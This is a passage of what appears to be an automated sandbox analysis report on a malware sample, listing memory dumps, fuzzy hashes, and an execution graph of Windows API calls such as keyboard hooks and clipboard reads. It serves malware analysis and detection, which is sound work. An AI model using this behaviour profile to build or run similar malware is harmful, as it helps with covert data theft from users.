                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 2f95a551f154f77953c70b73515c29f78f8796dcd698636aec2c400f3584676e
                                                                                                                    • Instruction ID: 362a518ffe6d9255ebcd35712a23afd07d1a0d981a8c37ed74a80b762e30ac0b
                                                                                                                    • Opcode Fuzzy Hash: 2f95a551f154f77953c70b73515c29f78f8796dcd698636aec2c400f3584676e
                                                                                                                    • Instruction Fuzzy Hash: D91167B18003099FCB10DFAAC845AEFBFF5EF88320F248419E519A7250CB75A954DFA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 24a28d4df1649bfbc1b4a9b04cbb8ee4876aaca60cdf5fad7238795ef8ca38eb
                                                                                                                    • Instruction ID: 4d760346fd0507441059d2de912e69cbb02f1d78b37f4cb42afc726c08a9723e
                                                                                                                    • Opcode Fuzzy Hash: 24a28d4df1649bfbc1b4a9b04cbb8ee4876aaca60cdf5fad7238795ef8ca38eb
                                                                                                                    • Instruction Fuzzy Hash: 6E1136B19003498FDB20DFAAC4457DEFBF5EB88324F248819D51AA7250CB75A944CBA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01A0AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 0fc4268c07b78bb12acf94bba2f4cb4222dadab61d8bb7cb36835ef577066e3e
                                                                                                                    • Instruction ID: 1830394fefa041038d147c4d476c7e9570f7b9410c7f6defc9e7527ff144768f
                                                                                                                    • Opcode Fuzzy Hash: 0fc4268c07b78bb12acf94bba2f4cb4222dadab61d8bb7cb36835ef577066e3e
                                                                                                                    • Instruction Fuzzy Hash: 5D1110B5C003498FDB10CF9AD444ADEFBF4EB88324F10841AD419A7650C779A545CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0B8015C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922431803.000000000B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b800000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: efc03bf0e9a0e24c13eaf7120defc79996f417b1e369193ec91caa24578b51dc
                                                                                                                    • Instruction ID: 042352cbcbd3177a4acf11b9d8a151ea38f0f8454c9629b37064bd8321a6fd3e
                                                                                                                    • Opcode Fuzzy Hash: efc03bf0e9a0e24c13eaf7120defc79996f417b1e369193ec91caa24578b51dc
                                                                                                                    • Instruction Fuzzy Hash: 8C11E5B58003499FDB10DF9AD849BDEFFF8EB48320F108459E519A7650C775A544CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0B8015C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922431803.000000000B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b800000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 357c1f218cbfae61b103fce6096e21da3ebcd96d0afa490052f0fc9001e064a0
                                                                                                                    • Instruction ID: 7ff2c8db98402154a987b4bdfab4669089d5f7687a7e79b67c0f3851d5c84273
                                                                                                                    • Opcode Fuzzy Hash: 357c1f218cbfae61b103fce6096e21da3ebcd96d0afa490052f0fc9001e064a0
                                                                                                                    • Instruction Fuzzy Hash: ED1115B5800349DFDB10DF99D949BDEBBF8EB48320F10840AE519B7650C374A544CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912709538.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_161d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e63882e3a89d37fc6f24073d9bc24f3a19192eae7687f8c43c4b4058a4941ef6
                                                                                                                    • Instruction ID: 7e30592d91fd9e03bcd5eecbc51ca5cfde43fe607951de94249dd7ed1452d54b
                                                                                                                    • Opcode Fuzzy Hash: e63882e3a89d37fc6f24073d9bc24f3a19192eae7687f8c43c4b4058a4941ef6
                                                                                                                    • Instruction Fuzzy Hash: 1721D871504240DFDB05DF98DDC8B66BFA5FB84324F28C669EA190B35AC336D416CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912794226.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_163d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7d12f67eb6c647fc84f14a691469f6ec373fd581d20f097ac19fa120950b2d7
                                                                                                                    • Instruction ID: aa9097b7b71b1917f1d78a8739782315dcc81c8a3720ffc149ac4650f832ccb2
                                                                                                                    • Opcode Fuzzy Hash: b7d12f67eb6c647fc84f14a691469f6ec373fd581d20f097ac19fa120950b2d7
                                                                                                                    • Instruction Fuzzy Hash: 3B21F571604200EFDB05DF98D9C4B25BBA5FBC4324F64C66DEA0A4B352C736D416CA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912794226.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_163d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ef052dce16db20202986f5ac190991b46957732a65e183293b196488482b079
                                                                                                                    • Instruction ID: 740b2016b4f36b26f0a6cf626b5de40e59039fb62d60053eeab311685e693a59
                                                                                                                    • Opcode Fuzzy Hash: 9ef052dce16db20202986f5ac190991b46957732a65e183293b196488482b079
                                                                                                                    • Instruction Fuzzy Hash: 192100B1604200DFCB15DF68D8C4B26FBA5FB84714F60C96DE80A0B382C33AD807CA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912709538.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_161d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                                                                    • Instruction ID: b109c35cb0f3943a7c7211d4292ef83e2669d000c41dde9b6a03d6c1ae988cff
                                                                                                                    • Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
                                                                                                                    • Instruction Fuzzy Hash: E021B176504240DFDB16CF54D9C8B56BF72FB84324F28C6A9DD090B65AC33AD42ACBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912794226.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_163d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: 5c462fb9ea37a3bb2852c33549b3b774ea09eadacdf29da133626a02a99bde80
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 8F11BE75504280CFDB12CF54D9C4B15FBA2FB84714F24C6A9D8494B796C33AD40ACB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1912794226.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_163d000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: 5bcb5c2213590f328eb918be1a09769ec17ac942c42dc1c949f6ef2e0adc3948
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 8911BB75904280DFDB02CF54C9C4B15BBB2FB84224F24C6ADD9494B396C33AD40ACB61

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:10.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:164
                                                                                                                    Total number of Limit Nodes:21
                                                                                                                    execution_graph 42249 6ec5c98 42250 6ec5d00 CreateWindowExW 42249->42250 42252 6ec5dbc 42250->42252 42252->42252 42253 6ecb5d8 42254 6ecb5e3 42253->42254 42255 6ecb5f3 42254->42255 42257 6ecb048 42254->42257 42258 6ecb628 OleInitialize 42257->42258 42259 6ecb68c 42258->42259 42259->42255 42260 6ec9b98 DuplicateHandle 42261 6ec9c2e 42260->42261 42262 6ecd2b0 42263 6ecd2f4 SetWindowsHookExA 42262->42263 42265 6ecd33a 42263->42265 42067 17ed030 42068 17ed048 42067->42068 42069 17ed0a2 42068->42069 42073 6ec384c 42068->42073 42080 6ec5e42 42068->42080 42084 6ec5e50 42068->42084 42076 6ec3857 42073->42076 42074 6eca801 42094 6ec974c 42074->42094 42076->42074 42077 6eca7f1 42076->42077 42088 6eca928 42077->42088 42078 6eca7ff 42081 6ec5e50 42080->42081 42082 6ec384c 2 API calls 42081->42082 42083 6ec5e97 42082->42083 42083->42069 42085 6ec5e76 42084->42085 42086 6ec384c 2 API calls 42085->42086 42087 6ec5e97 42086->42087 42087->42069 42090 6eca936 42088->42090 42089 6ec974c 2 API calls 42089->42090 42090->42089 42091 6ecaa0e 42090->42091 42101 6ecae00 42090->42101 42106 6ecadf0 42090->42106 42091->42078 42095 6ec9757 42094->42095 42096 6ecaa6a 42095->42096 42097 6ecab14 42095->42097 42099 6ecaac2 CallWindowProcW 42096->42099 42100 6ecaa71 42096->42100 42098 6ec384c OleGetClipboard 42097->42098 42098->42100 42099->42100 42100->42078 42102 6ecae1f 42101->42102 42103 6ecae76 42102->42103 42111 6ecb3b8 42102->42111 42117 6ecb377 42102->42117 42103->42090 42107 6ecadf6 42106->42107 42108 6ecade6 42107->42108 42109 6ecb3b8 OleGetClipboard 42107->42109 42110 6ecb377 OleGetClipboard 42107->42110 42108->42090 42109->42107 42110->42107 42113 6ecb3c0 42111->42113 42112 6ecb3d4 42112->42102 42113->42112 42123 6ecb400 42113->42123 42134 6ecb3f2 42113->42134 42114 6ecb3e9 42114->42102 42118 6ecb38d 42117->42118 42119 6ecb3d4 42118->42119 42121 6ecb400 OleGetClipboard 42118->42121 42122 6ecb3f2 OleGetClipboard 42118->42122 42119->42102 42120 6ecb3e9 42120->42102 42121->42120 42122->42120 42124 6ecb412 42123->42124 42125 6ecb42d 42124->42125 42127 6ecb471 42124->42127 42130 6ecb400 OleGetClipboard 42125->42130 42131 6ecb3f2 OleGetClipboard 42125->42131 42126 6ecb433 42126->42114 42129 6ecb4f1 42127->42129 42145 6ecb6c8 42127->42145 42149 6ecb6b8 42127->42149 42128 6ecb50f 42128->42114 42129->42114 42130->42126 42131->42126 42135 6ecb3fa 42134->42135 42136 6ecb42d 42135->42136 42137 6ecb471 42135->42137 42143 6ecb400 OleGetClipboard 42136->42143 42144 6ecb3f2 OleGetClipboard 42136->42144 42139 6ecb4f1 42137->42139 42140 6ecb6c8 OleGetClipboard 42137->42140 42141 6ecb6b8 OleGetClipboard 42137->42141 42138 6ecb50f 42138->42114 42139->42114 42140->42138 42141->42138 42142 6ecb433 42142->42114 42143->42142 42144->42142 42147 6ecb6dd 42145->42147 42148 6ecb703 42147->42148 42154 6ecb160 42147->42154 42148->42128 42150 6ecb6a6 42149->42150 42152 6ecb6c6 42149->42152 42150->42128 42151 6ecb160 OleGetClipboard 42151->42152 42152->42151 42153 6ecb703 42152->42153 42153->42128 42155 6ecb770 OleGetClipboard 42154->42155 42157 6ecb80a 42155->42157 42158 1870848 42160 1870849 42158->42160 42159 187091b 42160->42159 42162 1871340 42160->42162 42164 1871343 42162->42164 42163 1871454 42163->42160 42164->42163 42168 18780f9 42164->42168 42173 6ec3008 42164->42173 42179 6ec2fc7 42164->42179 42169 1878103 42168->42169 42170 18781b9 42169->42170 42185 6edfa88 42169->42185 42189 6edfa78 42169->42189 42170->42164 42174 6ec301a 42173->42174 42177 6ec30cb 42174->42177 42193 6ec2d04 42174->42193 42176 6ec3091 42197 6ec2d24 42176->42197 42177->42164 42180 6ec2fdd 42179->42180 42181 6ec2d04 3 API calls 42180->42181 42183 6ec30cb 42180->42183 42182 6ec3091 42181->42182 42184 6ec2d24 KiUserCallbackDispatcher 42182->42184 42183->42164 42184->42183 42186 6edfa9d 42185->42186 42187 6edfcae 42186->42187 42188 6edfcdb GlobalMemoryStatusEx 42186->42188 42187->42170 42188->42186 42190 6edfa88 42189->42190 42191 6edfcae 42190->42191 42192 6edfcdb GlobalMemoryStatusEx 42190->42192 42191->42170 42192->42190 42194 6ec2d0f 42193->42194 42201 6ec41c8 42194->42201 42195 6ec326a 42195->42176 42198 6ec2d2f 42197->42198 42200 6ecad4b 42198->42200 42245 6ec97a4 42198->42245 42200->42177 42202 6ec41f3 42201->42202 42208 6ec4740 42202->42208 42213 6ec4731 42202->42213 42203 6ec4276 42204 6ec3714 GetModuleHandleW 42203->42204 42205 6ec42a2 42203->42205 42204->42205 42209 6ec476d 42208->42209 42210 6ec47ee 42209->42210 42218 6ec490f 42209->42218 42230 6ec4995 42209->42230 42214 6ec4740 42213->42214 42215 6ec47ee 42214->42215 42216 6ec490f 2 API calls 42214->42216 42217 6ec4995 2 API calls 42214->42217 42216->42215 42217->42215 42219 6ec491a 42218->42219 42241 6ec3714 42219->42241 42221 6ec4b0f 42221->42210 42222 6ec4a3a 42222->42221 42223 6ec3714 GetModuleHandleW 42222->42223 42227 6ec4ab4 42222->42227 42224 6ec4a88 42223->42224 42225 6ec3714 GetModuleHandleW 42224->42225 42224->42227 42225->42227 42226 6ec4bce 42226->42210 42227->42221 42227->42226 42228 6ec4c38 GetModuleHandleW 42227->42228 42229 6ec4c65 42228->42229 42229->42210 42231 6ec49ee 42230->42231 42232 6ec3714 GetModuleHandleW 42231->42232 42233 6ec4a3a 42232->42233 42234 6ec3714 GetModuleHandleW 42233->42234 42237 6ec4ab4 42233->42237 42238 6ec4b0f 42233->42238 42235 6ec4a88 42234->42235 42236 6ec3714 GetModuleHandleW 42235->42236 42235->42237 42236->42237 42237->42238 42239 6ec4c38 GetModuleHandleW 42237->42239 42238->42210 42240 6ec4c65 42239->42240 42240->42210 42242 6ec4bf0 GetModuleHandleW 42241->42242 42244 6ec4c65 42242->42244 42244->42222 42246 6ecad60 KiUserCallbackDispatcher 42245->42246 42248 6ecadce 42246->42248 42248->42198

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 125 6ed3580-6ed35a1 126 6ed35a3-6ed35a6 125->126 127 6ed35ac-6ed35cb 126->127 128 6ed3d47-6ed3d4a 126->128 137 6ed35cd-6ed35d0 127->137 138 6ed35e4-6ed35ee 127->138 129 6ed3d4c-6ed3d6b 128->129 130 6ed3d70-6ed3d72 128->130 129->130 132 6ed3d79-6ed3d7c 130->132 133 6ed3d74 130->133 132->126 134 6ed3d82-6ed3d8b 132->134 133->132 137->138 140 6ed35d2-6ed35e2 137->140 142 6ed35f4-6ed3603 138->142 140->142 254 6ed3605 call 6ed3d99 142->254 255 6ed3605 call 6ed3da0 142->255 144 6ed360a-6ed360f 145 6ed361c-6ed38f9 144->145 146 6ed3611-6ed3617 144->146 167 6ed38ff-6ed39ae 145->167 168 6ed3d39-6ed3d46 145->168 146->134 177 6ed39d7 167->177 178 6ed39b0-6ed39d5 167->178 180 6ed39e0-6ed39f3 call 6ed316c 177->180 178->180 183 6ed39f9-6ed3a1b call 6ed3178 180->183 184 6ed3d20-6ed3d2c 180->184 183->184 188 6ed3a21-6ed3a2b 183->188 184->167 185 6ed3d32 184->185 185->168 188->184 189 6ed3a31-6ed3a3c 188->189 189->184 190 6ed3a42-6ed3b18 189->190 202 6ed3b1a-6ed3b1c 190->202 203 6ed3b26-6ed3b56 190->203 202->203 207 6ed3b58-6ed3b5a 203->207 208 6ed3b64-6ed3b70 203->208 207->208 209 6ed3bd0-6ed3bd4 208->209 210 6ed3b72-6ed3b76 208->210 211 6ed3bda-6ed3c16 209->211 212 6ed3d11-6ed3d1a 209->212 210->209 213 6ed3b78-6ed3ba2 210->213 224 6ed3c18-6ed3c1a 211->224 225 6ed3c24-6ed3c32 211->225 212->184 212->190 220 6ed3ba4-6ed3ba6 213->220 221 6ed3bb0-6ed3bcd call 6ed3184 213->221 220->221 221->209 224->225 228 6ed3c49-6ed3c54 225->228 229 6ed3c34-6ed3c3f 225->229 232 6ed3c6c-6ed3c7d 228->232 233 6ed3c56-6ed3c5c 228->233 229->228 234 6ed3c41 229->234 238 6ed3c7f-6ed3c85 232->238 239 6ed3c95-6ed3ca1 232->239 235 6ed3c5e 233->235 236 6ed3c60-6ed3c62 233->236 234->228 235->232 236->232 240 6ed3c89-6ed3c8b 238->240 241 6ed3c87 238->241 243 6ed3cb9-6ed3d0a 239->243 244 6ed3ca3-6ed3ca9 239->244 240->239 241->239 243->212 245 6ed3cad-6ed3caf 244->245 246 6ed3cab 244->246 245->243 246->243 254->144 255->144
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 61217bfa8c7e772381148594766ce23b16ced68d1e3e890c0afab5aec901340d
                                                                                                                    • Instruction ID: e87e4274a5a066e8e8b32258465ac9633fde071fc5e9db719f613b4539f7d233
                                                                                                                    • Opcode Fuzzy Hash: 61217bfa8c7e772381148594766ce23b16ced68d1e3e890c0afab5aec901340d
                                                                                                                    • Instruction Fuzzy Hash: 3C322D35E1071A8FCB14DF64D8945ADB7B6FFC9300F2096A9D409AB254EF30AD86CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 638ba57be6334e4d58c5899292e56ade1ba4c857ae384a01af607cb8ec19536b
                                                                                                                    • Instruction ID: 94676fe9763c74c0144b9175d177e7a1e4f193d614264b4907d90c04fbb55063
                                                                                                                    • Opcode Fuzzy Hash: 638ba57be6334e4d58c5899292e56ade1ba4c857ae384a01af607cb8ec19536b
                                                                                                                    • Instruction Fuzzy Hash: EB23FA31D10B198ECB15EF68C8905ADF7B1FF99300F15D79AE458A7221EB70AAC5CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4c60f28c15490e766b9c2b7cc1e51f6f78683fa85584ba12b466b40fa57abfe
                                                                                                                    • Instruction ID: a2d0328a45ff7d380c02bfb43372004a81189a5061e9d63a30bb634a73546f55
                                                                                                                    • Opcode Fuzzy Hash: f4c60f28c15490e766b9c2b7cc1e51f6f78683fa85584ba12b466b40fa57abfe
                                                                                                                    • Instruction Fuzzy Hash: 8B629D34A003059FDB54DB68D594AADB7F2FB88318F249569E809EB394DB35EC42CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 6edade8-6edae06 1 6edae08-6edae0b 0->1 2 6edae0d-6edae29 1->2 3 6edae2e-6edae31 1->3 2->3 4 6edb005-6edb00e 3->4 5 6edae37-6edae3a 3->5 7 6edb014-6edb01e 4->7 8 6edae91-6edae9a 4->8 9 6edae3c-6edae49 5->9 10 6edae4e-6edae51 5->10 11 6edb01f-6edb056 8->11 12 6edaea0-6edaea4 8->12 9->10 13 6edae53-6edae57 10->13 14 6edae62-6edae65 10->14 26 6edb058-6edb05b 11->26 16 6edaea9-6edaeac 12->16 13->7 18 6edae5d 13->18 19 6edae6f-6edae72 14->19 20 6edae67-6edae6c 14->20 22 6edaebc-6edaebe 16->22 23 6edaeae-6edaeb7 16->23 18->14 24 6edae8c-6edae8f 19->24 25 6edae74-6edae87 19->25 20->19 27 6edaec5-6edaec8 22->27 28 6edaec0 22->28 23->22 24->8 24->16 25->24 30 6edb05d-6edb079 26->30 31 6edb07e-6edb081 26->31 27->1 32 6edaece-6edaef2 27->32 28->27 30->31 33 6edb090-6edb093 31->33 34 6edb083 31->34 50 6edaef8-6edaf07 32->50 51 6edb002 32->51 37 6edb095-6edb099 33->37 38 6edb0a0-6edb0a3 33->38 123 6edb083 call 6edb341 34->123 124 6edb083 call 6edb350 34->124 39 6edb0a9-6edb0e4 37->39 40 6edb09b 37->40 38->39 41 6edb30c-6edb30f 38->41 52 6edb0ea-6edb0f6 39->52 53 6edb2d7-6edb2ea 39->53 40->38 44 6edb31c-6edb31e 41->44 45 6edb311-6edb31b 41->45 42 6edb089-6edb08b 42->33 48 6edb325-6edb328 44->48 49 6edb320 44->49 48->26 54 6edb32e-6edb338 48->54 49->48 57 6edaf1f-6edaf5a call 6ed66b8 50->57 58 6edaf09-6edaf0f 50->58 51->4 62 6edb0f8-6edb111 52->62 63 6edb116-6edb15a 52->63 56 6edb2ec 53->56 56->41 74 6edaf5c-6edaf62 57->74 75 6edaf72-6edaf89 57->75 60 6edaf11 58->60 61 6edaf13-6edaf15 58->61 60->57 61->57 62->56 79 6edb15c-6edb16e 63->79 80 6edb176-6edb1b5 63->80 77 6edaf64 74->77 78 6edaf66-6edaf68 74->78 89 6edaf8b-6edaf91 75->89 90 6edafa1-6edafb2 75->90 77->75 78->75 79->80 85 6edb29c-6edb2b1 80->85 86 6edb1bb-6edb296 call 6ed66b8 80->86 85->53 86->85 91 6edaf95-6edaf97 89->91 92 6edaf93 89->92 96 6edafca-6edaffb 90->96 97 6edafb4-6edafba 90->97 91->90 92->90 96->51 99 6edafbc 97->99 100 6edafbe-6edafc0 97->100 99->96 100->96 123->42 124->42
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: e0be8d1c7c5903fe8daa724bf2792bbde161da59cac9449502410acab12db8a7
                                                                                                                    • Instruction ID: 628402ba869fba3030a3ae2be802b82afcdd5d76ef387d9025aa576ce5fb4aa4
                                                                                                                    • Opcode Fuzzy Hash: e0be8d1c7c5903fe8daa724bf2792bbde161da59cac9449502410acab12db8a7
                                                                                                                    • Instruction Fuzzy Hash: 1CE17D70E103198FCB65DF69D4846AEB7B2FB89304F209929D409AB344EF34ED46CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 256 6ed9268-6ed928d 257 6ed928f-6ed9292 256->257 258 6ed92b8-6ed92bb 257->258 259 6ed9294-6ed92b3 257->259 260 6ed9b7b-6ed9b7d 258->260 261 6ed92c1-6ed92d6 258->261 259->258 263 6ed9b7f 260->263 264 6ed9b84-6ed9b87 260->264 268 6ed92ee-6ed9304 261->268 269 6ed92d8-6ed92de 261->269 263->264 264->257 266 6ed9b8d-6ed9b97 264->266 273 6ed930f-6ed9311 268->273 270 6ed92e0 269->270 271 6ed92e2-6ed92e4 269->271 270->268 271->268 274 6ed9329-6ed939a 273->274 275 6ed9313-6ed9319 273->275 286 6ed939c-6ed93bf 274->286 287 6ed93c6-6ed93e2 274->287 276 6ed931d-6ed931f 275->276 277 6ed931b 275->277 276->274 277->274 286->287 292 6ed940e-6ed9429 287->292 293 6ed93e4-6ed9407 287->293 298 6ed942b-6ed944d 292->298 299 6ed9454-6ed946f 292->299 293->292 298->299 304 6ed949a-6ed94a4 299->304 305 6ed9471-6ed9493 299->305 306 6ed94b4-6ed952e 304->306 307 6ed94a6-6ed94af 304->307 305->304 313 6ed957b-6ed9590 306->313 314 6ed9530-6ed954e 306->314 307->266 313->260 318 6ed956a-6ed9579 314->318 319 6ed9550-6ed955f 314->319 318->313 318->314 319->318
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 8c9b47325ca68a6ed8b7a0cb3d9c963018250647ef31f013361e913be40c83f0
                                                                                                                    • Instruction ID: 53ab6975a1f0ef449e9bd719813eadd8a4573992193b6ab7f2e4524037453756
                                                                                                                    • Opcode Fuzzy Hash: 8c9b47325ca68a6ed8b7a0cb3d9c963018250647ef31f013361e913be40c83f0
                                                                                                                    • Instruction Fuzzy Hash: 6F912C34B1021A9BDB95DB65D8907AEB3F6FBC9304F109569C40DEB345EE34AC428B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
